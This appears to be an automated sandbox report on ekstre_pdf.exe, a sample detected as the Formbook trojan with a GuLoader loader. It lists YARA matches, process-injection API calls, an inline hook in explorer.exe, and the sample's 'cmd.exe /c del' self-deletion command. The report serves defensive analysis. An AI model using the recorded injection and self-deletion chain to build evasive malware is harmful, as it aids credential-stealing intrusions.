Source: 00000004.00000002.7554321091.0000000000690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.7552780025.0000000000190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.7552780025.0000000000190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.7552780025.0000000000190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.7576128335.000000000AEC7000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: Process Memory Space: ekstre_pdf.exe PID: 3132, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: cmd.exe PID: 6400, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\ekstre_pdf.exe

Code function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040352D

Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 0_2_0040755C	0_2_0040755C
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 0_2_00406D85	0_2_00406D85
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 0_2_6ED62351	0_2_6ED62351
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34070445	1_2_34070445
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340DD480	1_2_340DD480
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3413A526	1_2_3413A526
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_341275C6	1_2_341275C6
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3412F5C9	1_2_3412F5C9
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408C600	1_2_3408C600
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3410D62C	1_2_3410D62C
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3411D646	1_2_3411D646
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34094670	1_2_34094670
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34070680	1_2_34070680
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3412A6C0	1_2_3412A6C0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340E36EC	1_2_340E36EC
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3412F6F6	1_2_3412F6F6
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3406C6E0	1_2_3406C6E0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34126757	1_2_34126757
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34072760	1_2_34072760
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3407A760	1_2_3407A760
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3411E076	1_2_3411E076
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A508C	1_2_340A508C
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340600A0	1_2_340600A0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3407B0D0	1_2_3407B0D0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_341270F1	1_2_341270F1
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F113	1_2_3405F113
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3413010E	1_2_3413010E
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3410D130	1_2_3410D130
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340B717A	1_2_340B717A
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340751C0	1_2_340751C0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408B1E0	1_2_3408B1E0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34032245	1_2_34032245
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3412124C	1_2_3412124C
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405D2EC	1_2_3405D2EC
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3407E310	1_2_3407E310
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3412F330	1_2_3412F330
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34061380	1_2_34061380
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34060C12	1_2_34060C12
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3407AC20	1_2_3407AC20
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3411EC4C	1_2_3411EC4C
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34073C60	1_2_34073C60
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3412EC60	1_2_3412EC60
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34126C69	1_2_34126C69
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34109C98	1_2_34109C98
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34088CDF	1_2_34088CDF
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340F7CE8	1_2_340F7CE8
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408FCE0	1_2_3408FCE0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3413ACEB	1_2_3413ACEB
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3406AD00	1_2_3406AD00
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3412FD27	1_2_3412FD27
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34127D4C	1_2_34127D4C
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34070D69	1_2_34070D69
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34082DB0	1_2_34082DB0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34079DD0	1_2_34079DD0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3410FDF4	1_2_3410FDF4
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340B2E48	1_2_340B2E48
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34090E50	1_2_34090E50
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34110E6D	1_2_34110E6D
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34071EB2	1_2_34071EB2
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34120EAD	1_2_34120EAD
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34129ED2	1_2_34129ED2
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34062EE8	1_2_34062EE8
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3407CF00	1_2_3407CF00
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3412FF63	1_2_3412FF63
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3412EFBF	1_2_3412EFBF
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34121FC6	1_2_34121FC6
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34076FE0	1_2_34076FE0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34073800	1_2_34073800
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409E810	1_2_3409E810
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34110835	1_2_34110835
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3412F872	1_2_3412F872
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34056868	1_2_34056868
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34079870	1_2_34079870
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408B870	1_2_3408B870
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340E5870	1_2_340E5870
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34086882	1_2_34086882
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340E98B2	1_2_340E98B2
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340728C0	1_2_340728C0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_341218DA	1_2_341218DA
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_341278F3	1_2_341278F3
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3406E9A0	1_2_3406E9A0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3412E9A6	1_2_3412E9A6
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340B59C0	1_2_340B59C0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340399E8	1_2_340399E8
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3412CA13	1_2_3412CA13
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3412EA5B	1_2_3412EA5B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3412FA89	1_2_3412FA89
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408FAA0	1_2_3408FAA0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340ADB19	1_2_340ADB19
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34070B10	1_2_34070B10
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3412FB2E	1_2_3412FB2E
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340E4BC0	1_2_340E4BC0

Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: String function: 340A5050 appears 36 times
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: String function: 340B7BE4 appears 91 times
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: String function: 3405B910 appears 268 times
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: String function: 340EEF10 appears 105 times
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: String function: 340DE692 appears 86 times

Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A2C30 NtMapViewOfSection,LdrInitializeThunk,	1_2_340A2C30
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A2C50 NtUnmapViewOfSection,LdrInitializeThunk,	1_2_340A2C50
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A2CF0 NtDelayExecution,LdrInitializeThunk,	1_2_340A2CF0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A2D10 NtQuerySystemInformation,LdrInitializeThunk,	1_2_340A2D10
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A2DA0 NtReadVirtualMemory,LdrInitializeThunk,	1_2_340A2DA0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,	1_2_340A2DC0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A2E50 NtCreateSection,LdrInitializeThunk,	1_2_340A2E50
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A2EB0 NtProtectVirtualMemory,LdrInitializeThunk,	1_2_340A2EB0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A2ED0 NtResumeThread,LdrInitializeThunk,	1_2_340A2ED0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A2F00 NtCreateFile,LdrInitializeThunk,	1_2_340A2F00
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A29F0 NtReadFile,LdrInitializeThunk,	1_2_340A29F0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A2A80 NtClose,LdrInitializeThunk,	1_2_340A2A80
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A2B10 NtAllocateVirtualMemory,LdrInitializeThunk,	1_2_340A2B10
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A2B90 NtFreeVirtualMemory,LdrInitializeThunk,	1_2_340A2B90
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A2BC0 NtQueryInformationToken,LdrInitializeThunk,	1_2_340A2BC0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A34E0 NtCreateMutant,	1_2_340A34E0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A4570 NtSuspendThread,	1_2_340A4570
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A4260 NtSetContextThread,	1_2_340A4260
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A2C10 NtOpenProcess,	1_2_340A2C10
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A2C20 NtSetInformationFile,	1_2_340A2C20
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A3C30 NtOpenProcessToken,	1_2_340A3C30
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A3C90 NtOpenThread,	1_2_340A3C90
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A2CD0 NtEnumerateKey,	1_2_340A2CD0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A2D50 NtWriteVirtualMemory,	1_2_340A2D50
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A2E00 NtQueueApcThread,	1_2_340A2E00
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A2E80 NtCreateProcessEx,	1_2_340A2E80
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A2EC0 NtQuerySection,	1_2_340A2EC0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A2F30 NtOpenDirectoryObject,	1_2_340A2F30
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A2FB0 NtSetValueKey,	1_2_340A2FB0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A38D0 NtGetContextThread,	1_2_340A38D0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A29D0 NtWaitForSingleObject,	1_2_340A29D0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A2A10 NtWriteFile,	1_2_340A2A10
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A2AA0 NtQueryInformationFile,	1_2_340A2AA0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A2AC0 NtEnumerateValueKey,	1_2_340A2AC0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A2B00 NtQueryValueKey,	1_2_340A2B00
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A2B20 NtQueryInformationProcess,	1_2_340A2B20
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A2B80 NtCreateKey,	1_2_340A2B80
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A2BE0 NtQueryVirtualMemory,	1_2_340A2BE0

Source: ekstre_pdf.exe, 00000001.00000003.3033029052.00000000000EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs ekstre_pdf.exe
Source: ekstre_pdf.exe, 00000001.00000002.3100797476.0000000034300000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs ekstre_pdf.exe
Source: ekstre_pdf.exe, 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs ekstre_pdf.exe
Source: ekstre_pdf.exe, 00000001.00000003.2937505788.0000000033FB3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs ekstre_pdf.exe
Source: ekstre_pdf.exe, 00000001.00000002.3100181991.0000000033F1E000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs ekstre_pdf.exe
Source: ekstre_pdf.exe, 00000001.00000003.2932454534.0000000033E00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs ekstre_pdf.exe
Source: ekstre_pdf.exe, 00000001.00000003.3031995603.0000000003CD8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs ekstre_pdf.exe

Source: C:\Users\user\Desktop\ekstre_pdf.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: edgegdi.dll	Jump to behavior

Source: ekstre_pdf.exe

Static PE information: invalid certificate

Source: ekstre_pdf.exe	ReversingLabs: Detection: 18%
Source: ekstre_pdf.exe	Virustotal: Detection: 40%

Source: C:\Users\user\Desktop\ekstre_pdf.exe

File read: C:\Users\user\Desktop\ekstre_pdf.exe

Jump to behavior

Source: ekstre_pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ekstre_pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ekstre_pdf.exe C:\Users\user\Desktop\ekstre_pdf.exe
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Process created: C:\Users\user\Desktop\ekstre_pdf.exe C:\Users\user\Desktop\ekstre_pdf.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\ekstre_pdf.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Process created: C:\Users\user\Desktop\ekstre_pdf.exe C:\Users\user\Desktop\ekstre_pdf.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\ekstre_pdf.exe"	Jump to behavior

Source: C:\Users\user\Desktop\ekstre_pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\ekstre_pdf.exe

0_2_0040352D

Source: C:\Users\user\Desktop\ekstre_pdf.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical

Jump to behavior

Source: C:\Users\user\Desktop\ekstre_pdf.exe

File created: C:\Users\user\AppData\Local\Temp\nswB1F0.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@369/14@24/15

Source: C:\Users\user\Desktop\ekstre_pdf.exe

Code function: 0_2_004021AA LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,

0_2_004021AA

Source: C:\Users\user\Desktop\ekstre_pdf.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\ekstre_pdf.exe

Code function: 0_2_0040498A GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_0040498A

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3348:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3348:304:WilStaging_02

Source: C:\Users\user\Desktop\ekstre_pdf.exe

File written: C:\Users\user\AppData\Roaming\DORME.ini

Jump to behavior

Source: ekstre_pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: ekstre_pdf.exe, 00000001.00000001.2824065477.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: wntdll.pdbUGP source: ekstre_pdf.exe, 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmp, ekstre_pdf.exe, 00000001.00000003.2932454534.0000000033CDD000.00000004.00000020.00020000.00000000.sdmp, ekstre_pdf.exe, 00000001.00000003.2937505788.0000000033E86000.00000004.00000020.00020000.00000000.sdmp, ekstre_pdf.exe, 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.7559130925.0000000003050000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.7559130925.000000000317D000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.3038439625.0000000000C1C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: ekstre_pdf.exe, 00000001.00000002.3100181991.0000000033ED0000.00000040.10000000.00040000.00000000.sdmp, ekstre_pdf.exe, 00000001.00000003.3033029052.00000000000A1000.00000004.00000020.00020000.00000000.sdmp, ekstre_pdf.exe, 00000001.00000003.3031995603.0000000003CD8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.7558532331.0000000000FF0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: ekstre_pdf.exe, ekstre_pdf.exe, 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmp, ekstre_pdf.exe, 00000001.00000003.2932454534.0000000033CDD000.00000004.00000020.00020000.00000000.sdmp, ekstre_pdf.exe, 00000001.00000003.2937505788.0000000033E86000.00000004.00000020.00020000.00000000.sdmp, ekstre_pdf.exe, 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.7559130925.0000000003050000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.7559130925.000000000317D000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.3038439625.0000000000C1C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: ekstre_pdf.exe, 00000001.00000001.2824065477.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: cmd.pdb source: ekstre_pdf.exe, 00000001.00000002.3100181991.0000000033ED0000.00000040.10000000.00040000.00000000.sdmp, ekstre_pdf.exe, 00000001.00000003.3033029052.00000000000A1000.00000004.00000020.00020000.00000000.sdmp, ekstre_pdf.exe, 00000001.00000003.3031995603.0000000003CD8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.7558532331.0000000000FF0000.00000040.80000000.00040000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.3005389294.00000000052B5000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340397A1 push es; iretd	1_2_340397A8
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340321AD pushad ; retf 0004h	1_2_3403223F
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340608CD push ecx; mov dword ptr [esp], ecx	1_2_340608D6

Source: C:\Users\user\Desktop\ekstre_pdf.exe

Code function: 0_2_6ED62351 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_6ED62351

Source: C:\Users\user\Desktop\ekstre_pdf.exe

File created: C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x83 0x3E 0xE8

Source: C:\Users\user\Desktop\ekstre_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
